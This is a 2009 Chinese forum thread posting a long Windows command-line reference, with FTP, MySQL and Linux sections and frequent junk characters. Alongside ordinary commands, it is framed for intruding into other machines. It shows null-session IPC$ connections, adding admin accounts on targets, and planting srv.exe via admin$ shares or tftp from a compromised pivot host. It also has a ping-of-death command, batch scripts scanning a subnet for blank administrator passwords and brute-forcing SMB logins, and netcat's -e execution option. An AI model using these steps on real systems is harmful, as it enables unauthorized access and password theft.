下沙论坛

 找回密码
 注册论坛(EC通行证)

QQ登录

QQ登录

下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
查看: 2975|回复: 9
打印 上一主题 下一主题

CMD命令大全

[复制链接]
  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    跳转到指定楼层
    1
    发表于 2009-5-4 09:32:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
    一:
    / c! @. ]! Q# @& r7 e' tnet use ipipc$ " " /user:" " 建立IPC空链接% A9 q! N9 U/ ]4 G2 b1 J' N1 F% M9 v3 r6 I
    net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接
    7 C  |- `. C/ u/ \net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:5 h, K' ^' S, `' @! m9 e
    net use h: ipc$ 登陆后映射对方C:到本地为H:
    - u- }" p7 C, ^6 _) xnet use ipipc$ /del 删除IPC链接
    # Q; t( N  y- q9 dnet use h: /del 删除映射对方到本地的为H:的映射' b" H8 y% N' h
    net user 用户名 密码 /add 建立用户0 u. G. x3 L" q1 z: [$ S
    net user guest /active:yes 激活guest用户' G' q& y! @( {& P$ [5 H0 F
    net user 查看有哪些用户: B8 x! z  A! q% H4 r. D2 u2 v2 P
    net user 帐户名 查看帐户的属性
    . R, o5 I7 Y; q! ^; `# c4 e# @net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数/ J" Y, v% R8 N" }
    net start 查看开启了哪些服务
    3 A2 X, W2 }) Z! Q! W: G6 X9 L7 U8 ?net start 服务名  开启服务;(如:net start telnet, net start schedule)
    - q5 }+ I# C/ y" v3 V9 u: w3 T' qnet stop 服务名 停止某服务8 u( t1 X6 O( a5 d, u
    net time 目标ip 查看对方时间
    * N, R+ o; i( A: [* Lnet time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
    , _& y5 {, M- O5 ^, Z. S1 Nnet view 查看本地局域网内开启了哪些共享
    " f9 l& m- }7 p, p! [net view ip 查看对方局域网内开启了哪些共享
    # i7 v! Z7 x) H9 J; P/ j1 ]9 Xnet config 显示系统网络设置( @+ ^$ d, N5 M- g" o8 @3 ^0 b- t8 k
    net logoff 断开连接的共享: ?) R( }: ]$ k4 K+ e
    net pause 服务名 暂停某服务+ {8 ?& e: U) X1 x4 z
    net send ip "文本信息" 向对方发信息2 s0 {) n/ g" t
    net ver 局域网内正在使用的网络连接类型和信息( P5 A, d3 ~" R6 |# L
    net share 查看本地开启的共享) N$ w  x' p  }7 z# v0 \2 C
    net share ipc$ 开启ipc$共享( Y8 O2 f& U3 q/ R' f! l
    net share ipc$ /del 删除ipc$共享
    ' R$ S  @- F: y$ ?4 ^* Onet share c$ /del 删除C:共享
    # ^! A4 H, o9 J/ U, Knet user guest 12345 用guest用户登陆后用将密码改为12345. b- W8 s  b$ ^5 c3 K9 X
    net password 密码 更改系统登陆密码, A6 S1 W% D3 ?
    netstat -a 查看开启了哪些端口,常用netstat -an
    & \7 q5 g2 N5 f3 @( C/ W( I6 |netstat -n 查看端口的网络连接情况,常用netstat -an6 Z  P4 r+ v5 E0 n0 P1 t
    netstat -v 查看正在进行的工作6 h4 T5 P2 C7 S4 Y0 E
    netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
    ' U& F+ ]* W; C0 u, I- e: r: ?netstat -s 查看正在使用的所有协议使用情况
    0 N+ I4 x, ~6 Qnbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写0 p2 q8 g5 R% k! L: B% r
    tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
    ) g2 [2 }) b7 lping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
    6 y/ Q% ?- V4 G8 X9 w: Sping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
    9 _  O- A! z  i" o! M3 A+ }ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息- b6 {" R% }; ?# o1 u% W9 J
    tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
    % \& g/ |( O# l( Kkill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)4 P/ E0 L5 }( O8 S3 y
    del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
    ; w! {4 m. i" S
    分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
    收藏收藏 分享分享 顶 踩
  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    2
     楼主| 发表于 2009-5-4 09:33:01 | 只看该作者
    二:
    ' O( z" \* a% T  o; P  \del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
    ' R$ n" A% t$ R1 [move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
    5 E5 b% ?  D9 T: K; Wfc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令
    " j' {, h8 P7 X+ k! U/ v0 z5 Dat id号 开启已注册的某个计划任务
    ; p3 i8 _/ V' Z. X3 bat /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
    7 [: f: L1 c: P+ Rat id号 /delete 停止某个已注册的计划任务0 l2 ]" R' O4 l- u1 ^3 h5 I
    at 查看所有的计划任务
    . w( [; M& V6 X0 `6 r+ ]  r5 aat ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机. a( p' b8 }: Z
    finger username @host 查看最近有哪些用户登陆
    0 m8 V! I  E' K  z2 W4 Ltelnet ip 端口 远和登陆服务器,默认端口为23- `5 A, U) B0 a/ n7 j
    open ip 连接到IP(属telnet登陆后的命令)7 V% P8 _. U. A7 O( j- W# R
    telnet 在本机上直接键入telnet 将进入本机的telnet5 J) v* ^) N; g7 @
    copy 路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
    4 [8 h4 b' L" Z- }# icopy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下
    + ?8 a  y1 h7 ycppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
    / d" N0 }" T5 }copy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:5 F, t# T4 P/ N5 q( Z
    xcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件. n8 z, R% b8 j8 o( \
    tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后,将“IP”的server.exe下载到目标主机c:server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
    : J( q4 Y, `3 Ttftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机
    : H) W" W6 _; `2 D, jftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
    2 |% \4 U  b0 L5 O2 O- kroute print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
    4 A; I' U( _' earp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息1 |5 i3 ]% h' b4 m: Z; ^. X1 x2 k! V# u
    start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
    ' l" _: a2 j6 X  r5 S2 Vmem 查看cpu使用情况
    0 `9 W2 b1 u6 I0 Lattrib 文件名(目录名) 查看某文件(目录)的属性. ^" M; o; u. @. q3 D
    attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
      x% I3 p. X8 k7 |# h9 e# bdir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间7 R5 D7 ^; w$ b" r6 a1 i% l
    date /t 、 time /t 使用此参数即“DATE/T" ~- T! @4 Z- y/ Z( }2 i
    ”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
    ) v6 B& ^8 Q- g- t% tset 指定环境变量名称=要指派给变量的字符 设置环境变量
    $ j' N6 \# i, w: P! eset 显示当前所有的环境变量
    % |" s4 x9 m) p7 b1 {set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量; T  }9 k+ P/ m) g( I+ U1 Y, `6 X% |
    pause 暂停批处理程序,并显示出:请按任意键继续....2 ?( D8 a( G  T2 x# H" j- X9 g
    if 在批处理程序中执行条件处理(更多说明见if命令及变量)$ s, w. S4 x1 I& d+ k# t  s
    goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
    # I& L2 H0 ^; Tcall 路径批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
    4 Z6 _' ^5 C# l: m* v) efor 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
      W6 C' l3 K  b5 Y) `echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置1 n- c! v" @6 K8 x# M* }
    echo 信息 在屏幕上显示出信息
    - ~. b4 d2 s- v; J2 c! Vecho 信息 >> pass.txt 将"信息"保存到pass.txt文件中# w# s0 n* B; }# ?5 S: J
    findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello6 x9 E9 E  Y# ^! {
    find 文件名 查找某文件
      d$ [# v$ _: \6 E7 X, x! L# Ptitle 标题名字 更改CMD窗口标题名字
    ) E2 W/ H& z' Zcolor 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白: P, H: u7 e$ s7 B3 u8 ]3 p" o
    prompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为:EntSky )9 }5 f" p$ ]0 L& ^4 w# W/ x
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    3
     楼主| 发表于 2009-5-4 09:33:35 | 只看该作者
    三:
    1 \6 n/ _5 ]0 Y! @- M& kver 在DOS窗口下显示版本信息5 E# s0 \) \& ~) U5 O! l- I" n
    winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
    7 ]: {; g( `' v7 b" Eformat 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS& _( M' p' Y2 e9 F: I2 g
    md 目录名 创建目录& t; B. Y0 S0 V3 |  z9 Z
    replace 源文件 要替换文件的目录 替换文件! Z' F! D; s- o; W$ H8 \4 N# G# s; B
    ren 原文件名 新文件名 重命名文件名9 L9 j9 s' ?9 ]1 {: _/ A( z
    tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
    . u2 G0 [* _/ O3 m6 g5 ]type 文件名 显示文本文件的内容
    9 g, w- P  [+ V' n4 x+ Q8 Zmore 文件名 逐屏显示输出文件
    / S9 z+ N0 C: y6 G# n+ a) c- W( @doskey 要锁定的命令=字符
    $ t! L0 u3 m- s7 G+ t- v% U/ Ydoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=- g" X. @3 K( m, p0 k, Z* ^! J
    taskmgr 调出任务管理器" m, T: _" O- L
    chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
    - a& k5 c* Z' g% V4 R0 Mtlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
    ' M9 e# G1 x+ l. k4 kexit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe
    3 x3 q6 `& C+ m% X4 hpath 路径可执行文件的文件名 为可执行文件设置一个路径。
    : L2 T& H7 L4 ~cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?0 Z( _$ j6 ~  j7 ]7 F1 n: x
    regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;( Y# \8 z7 ^/ ~% H  |% x
    regedit /e 注册表文件名 导出注册表
    ' P9 J. p; e# Z- M  @cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D: est.txt /D pub 设定d: est.txt拒绝pub用户访问。2 t/ U4 n! B2 d5 Y' O( f
    cacls 文件名 查看文件的访问用户权限列表  d0 ]3 @" T7 E4 _+ v6 A  K+ r2 r
    REM 文本内容 在批处理文件中添加注解! v+ e# G% z1 n1 k; s$ z" P
    netsh 查看或更改本地网络配置情况
    1 V- K8 d; J, ~' p' x9 \
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    4
     楼主| 发表于 2009-5-4 09:35:09 | 只看该作者
    四:6 o0 W! `% `% I7 F) L
    IIS服务命令:
    , S8 @- k  p# N, D0 u; v7 qiisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)
    9 ^- a( Y" g2 Piisreset /start或stop 启动(停止)所有Internet服务8 _, y3 G4 W0 v+ A4 K- K
    iisreset /restart 停止然后重新启动所有Internet服务. }' C% ?5 a3 J# s* m. O0 y7 b
    iisreset /status 显示所有Internet服务状态6 {9 l, ?# F, z; `( c1 Z% D
    iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动
      O# W, t) l. |. x9 piisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机4 K* ~# P2 o  l3 ^8 s( I
    iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务' Y. y  V& q5 I4 M/ X
    iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。$ q+ J6 f/ n8 {8 z  L; u/ ?
    FTP 命令: (后面有详细说明内容)5 I6 m% g- Q" v' q/ |
    ftp的命令行格式为:
    + E- v3 ?. s% J5 ^7 c+ Hftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。$ y# R- C) S' r0 o% N- M) k
    -d 使用调试方式。
    ) Z2 \6 }9 R5 ]! v2 i" X( |-n 限制ftp的自动登录,即不使用.netrc文件。% D% A' ]& S: ~, X8 E
    -g 取消全局文件名。( n' d) w) S6 b, e3 |
    help [命令] 或 ?[命令] 查看命令说明8 I/ R: X. a6 w/ O$ s# _
    bye 或 quit 终止主机FTP进程,并退出FTP管理方式.- w* X) P) ?9 a: O- v& T  a9 H
    pwd 列出当前远端主机目录9 y* D( R. H9 D9 ]& ^
    put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
    " _, X  {; T4 |; E, e: X8 Nget 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中7 L- i5 w% I. d8 @5 I: g
    mget [remote-files] 从远端主机接收一批文件至本地主机! K" v  L& b3 \. w% v) d, o- e
    mput local-files 将本地主机中一批文件传送至远端主机! M5 E5 J3 F5 |& a$ n* C
    dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
    ; b$ c  j; w7 C* Sascii 设定以ASCII方式传送文件(缺省值)6 e9 [$ H6 i2 A& e$ h. B
    bin 或 image 设定以二进制方式传送文件+ c& V  C$ p/ Y) X# J4 }
    bell 每完成一次文件传送,报警提示
    9 a6 ^7 b& ~. M. bcdup 返回上一级目录
    6 f1 o* t6 h, B  t" ^9 H; L' w& Fclose 中断与远程服务器的ftp会话(与open对应)/ a0 ?; I# H1 d1 @5 T- m, J: o
    open host[port] 建立指定ftp服务器连接,可指定连接端口# g7 b0 L! @# t; ]& B
    delete 删除远端主机中的文件
      l7 t# z) z+ ?mdelete [remote-files] 删除一批文件
    ) a3 }" F; K+ b& Wmkdir directory-name 在远端主机中建立目录
    % Z, }& P0 n' P7 hrename [from] [to] 改变远端主机中的文件名
    7 r% t2 D  F' t1 `rmdir directory-name 删除远端主机中的目录- }( T- h8 \- s9 |
    status 显示当前FTP的状态: L: u, C4 n3 a0 S$ B
    system 显示远端主机系统类型
    * W# p6 m) ~) z9 y" u# r( B0 J+ ouser user-name [password] [account] 重新以别的用户名登录远端主机6 t5 K* D9 a9 M: D# j" K
    open host [port] 重新建立一个新的连接. y/ o% A! D% P% o/ m* \
    prompt 交互提示模式
    5 i4 N0 k  b- t8 ~macdef 定义宏命令
      `4 _/ w: Y* p/ Nlcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录: P! Y2 P% s, f2 u: I$ x
    chmod 改变远端主机的文件权限
    : `9 v5 F& g% Scase 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母5 K0 k+ }7 T7 }) M- V4 Y' o2 t
    cd remote-dir 进入远程主机目录3 c! {- J% h" M) b4 X
    cdup 进入远程主机目录的父目录' i- e" t" c" \$ P( s/ a$ f
    ! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    5
     楼主| 发表于 2009-5-4 09:35:42 | 只看该作者
    五:" B# A  P& {0 E. S  i
    MYSQL 命令:; q! |& e7 L0 g2 Y! \
    mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。3 G, d3 h% n3 {6 y. n
    (例:mysql -h110.110.110.110 -Uroot -P123456
    + a. f6 o. _, U2 b注:u与root可以不用加空格,其它也一样)8 o2 b+ P9 i( b, r8 h- [- v
    exit 退出MYSQL/ P# u" Q5 _" Y5 B
    mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
    0 M' {  ]# w- Q+ c1 A+ [grant select on 数据库.* to 用户名@登录主机 identified by "密码"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)- `! x" q' K& M2 {, {
    show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。
    / @5 M0 O( a& }& K8 b$ @5 g  x* Ruse mysql;
    $ l& }1 ^: Y  r* l5 sshow tables; 显示库中的数据表- X. r  y! ]! z7 G
    describe 表名; 显示数据表的结构
    % \# p$ Q$ K1 D& Z+ J4 P1 W% hcreate database 库名; 建库, y6 P( c7 C# P
    use 库名;
    5 r6 N! S& ~5 u4 zcreate table 表名 (字段设定列表); 建表
    : R: O$ A( J- U$ _3 O( Gdrop database 库名;
    * X3 l) ?: e1 g3 Ydrop table 表名; 删库和删表" b3 m" b2 i- g; t& O; S
    delete from 表名; 将表中记录清空
    / q3 \$ C) k; p) m5 Gselect * from 表名; 显示表中的记录
    / j" `* s/ l3 m1 p/ Dmysqldump --opt school>school.bbb 备份数据库:(命令在DOS的mysqlin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。7 d) R& I* ?8 \: J
    win2003系统下新增命令(实用部份):# n( @7 D) G/ ~' W$ n  x( W! [& M
    shutdown /参数 关闭或重启本地或远程主机。
    - g1 K' T0 K4 g- K& X0 I参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。
    $ [. |/ W: u- I: `7 r例:shutdown /r /t 0 立即重启本地主机(无延时)' [+ m& l1 b: U  Q% q# P) [
    taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
    8 Z% O) `3 ~3 a4 \5 }2 ?7 M参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。( c& x- P% `2 U6 ^, B
    tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
    6 {0 `6 n/ b( {% W参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    6
     楼主| 发表于 2009-5-4 09:36:18 | 只看该作者
    六:
    - x" ]6 A  q. i) w: n" jLinux系统下基本命令: 要区分大小写
    9 E8 y% Y( m9 d) _2 Duname 显示版本信息(同win2K的 ver)
    4 v0 A$ R) K" l/ v! m$ l2 Pdir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)  }, D/ Y9 x  r4 k9 ^9 ^
    pwd 查询当前所在的目录位置
    * b* j- K8 u  N' A- \cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。$ q- z5 h! R- B8 p- h
    cat 文件名 查看文件内容
    $ m' u; Z; k' K7 i# m( A( lcat >abc.txt 往abc.txt文件中写上内容。- e; ]5 [% \6 f/ ~: C9 o0 K& ?$ Z; y
    more 文件名 以一页一页的方式显示一个文本文件。
    & u  F2 ]: ^* h. H. lcp 复制文件
    7 z* M( h( T( }, Imv 移动文件8 D& a+ b) N' O; C& g) a
    rm 文件名 删除文件,rm -a 目录名删除目录及子目录
    8 D1 p( T& d+ n. t- z+ zmkdir 目录名 建立目录
    0 M' P9 i+ k  yrmdir 删除子目录,目录内没有文档。
    # |9 I. ?/ Y( F) V$ B2 y; Cchmod 设定档案或目录的存取权限8 W6 {- k2 ~+ V
    grep 在档案中查找字符串
    ; Q- I7 [3 x4 Z( s- p$ hdiff 档案文件比较
    / \6 {. u1 a/ |1 Z+ K, a! ofind 档案搜寻* G! [6 T- @* Z3 \2 |
    date 现在的日期、时间
    3 Z) \+ b% d) J1 Q* H5 Zwho 查询目前和你使用同一台机器的人以及Login时间地点6 [0 \& J7 I: o5 H7 T9 M: n
    w 查询目前上机者的详细资料
    / ?* O9 z- P$ H& R: r9 ?whoami 查看自己的帐号名称4 ~$ B' |. \3 a+ V
    groups 查看某人的Group! T* g2 h1 D3 h6 ^
    passwd 更改密码/ G) x* s  R' @7 R
    history 查看自己下过的命令
    & ~6 ~6 x) B* X; ?$ dps 显示进程状态
    7 C: \  b7 c2 ~; J- hkill 停止某进程
    * h/ e  H2 i1 D' ~8 h) Vgcc 黑客通常用它来编译C语言写的文件$ C+ |3 U. f# L) s
    su 权限转换为指定使用者
    5 c, E; `7 F: K" W, qtelnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。
    0 v. c- v2 g, Z3 r1 _ftp ftp连接上某服务器(同win2K)/ J0 V  W6 a1 E( z1 F6 t9 E
    附:批处理命令与变量) @3 \: G% t7 v9 T( ]
    1:for命令及变量 基本格式:
    $ Q  D2 o! d. F9 UFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。
    ( X9 p- Z& U6 Z2 d批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use ipipc$ pass /user:user 中ip为%1,pass为%2 ,user为%38 o, k* Y  i) f% u# L# b9 z+ O
    (set):指定一个或一组文件,可使用通配符,如:(D:user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1 }( s( a( O6 {5 V  h6 t6 B/ e
    command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开
    6 s1 y4 a: T1 o8 ?command_parameters:为特定命令指定参数或命令行开关
    , e: G4 s7 q7 HIN (set):指在(set)中取值;DO command :指执行command
    ) z) P: D5 Y& y* j3 D3 k8 }参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:pass.txt)时 }。) Z2 y& T2 j* x! |
    用法举例:
    : J* @8 I  `" }% {+ Q( k@echo off# `! O5 Z! ~$ m' x# u. I
    echo 用法格式:test.bat *.*.* > test.txt
    7 u! U* H0 p$ @* [for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%G /user:administrator | find "命令成功完成" >>test.txt
    6 Z7 [/ X3 T' w5 O+ O存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。6 G* n& r7 {+ x( c
    /L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。
    4 I5 X8 A  P; r1 O/ D  V% Z) h9 u@echo off
    4 e6 Q) b7 i8 c6 j/ V8 y$ kecho 用法格式:ok.bat ip
    8 o: Y1 A) S; k: C7 |8 ]/ c  LFOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200
      S" H$ P; b6 D9 r; G: A4 F. ~$ s存为:ok.exe 说明:输入一个IP后,用字典文件d:pass.dic来暴解d:user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。
    4 q3 R. t; e( H) A. o
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    7
     楼主| 发表于 2009-5-4 09:36:48 | 只看该作者
    七:
    ) H8 x8 M- T% F! W$ Q) {2:if命令及变量 基本格式:& P' |7 z6 N& L& @$ `- y
    IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。2 _9 s% q4 J& r
    例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。
    ; C# ?( ?" {: i  `. ^0 指发现并成功执行(真);1 指没有发现、没执行(假)。
    8 t: e2 b" N9 G) _' F! j) \IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。
    9 o. M* E* q- u+ {. ~. A0 Y例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ")5 O9 I3 Q/ j( b! B. H* E
    IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。9 _0 T3 W' ?6 ~
    例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。
    3 [7 P  y9 r* m8 oIF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来,因为del命令要单独一行时才能执行,用上< >后就等于是单独一行了;例如:“if exist test.txt. <del test.txt.> else echo test.txt.missing ”,注意命令中的“.”+ s$ [' q1 @2 n
    (二)系统外部命令(均需下载相关工具):
    8 T& _7 {: j9 `* J: K# A1、瑞士军刀:nc.exe
    & B% f8 V" Y2 W参数说明:+ y" k5 C( w/ g3 `: {3 q
    -h 查看帮助信息9 D! M1 Z; _8 @, F7 {
    -d 后台模式
    - P9 w4 n8 W+ Y* N; \6 F. F-e prog程序重定向,一但连接就执行[危险], \& n# S) ~1 c, Y, ]3 l
    -i secs延时的间隔9 t. H( w0 C# {4 i
    -l 监听模式,用于入站连接/ z0 _0 g0 q0 s8 s5 W6 I8 ?4 }% w
    -L 监听模式,连接天闭后仍然继续监听,直到CTR+C
    & Z& _6 V5 o) C# r-n IP地址,不能用域名
    $ D; P7 h" L5 A+ B-o film记录16进制的传输/ E: X0 d1 s- p1 q& ]
    -p[空格]端口 本地端口号
    / }; @5 m" A; F7 J0 x+ D-r 随机本地及远程端口! ]* `0 |* O0 m0 g2 ^' ]$ c& D$ ?/ o
